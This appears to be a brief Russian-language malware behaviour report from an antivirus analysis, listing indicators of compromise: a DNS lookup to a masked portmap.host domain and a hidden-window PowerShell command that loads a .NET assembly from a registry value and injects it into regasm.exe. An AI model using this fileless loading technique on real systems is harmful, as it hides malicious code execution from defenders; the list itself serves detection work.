Техническая информация
- %WINDIR%\microsoft.net\framework\v2.0.50727\regasm.exe
- DNS ASK MO######0207.portmap.host
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [Reflection.Assembly]::Load((Get-ItemProperty HKCU:\/Software\/WumrOECrf).CRtnaaHP);[dl.pe]::je('RegAsm', (Get-ItemProperty HKCU:\/Software\/WumrOECrf).EBvYoWFDObXCAC)' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [Reflection.Assembly]::Load((Get-ItemProperty HKCU:\/Software\/WumrOECrf).CRtnaaHP);[dl.pe]::je('RegAsm', (Get-ItemProperty HKCU:\/Software\/WumrOECrf).EBvYoWFDObXCAC)
- '%WINDIR%\microsoft.net\framework\v2.0.50727\regasm.exe' 1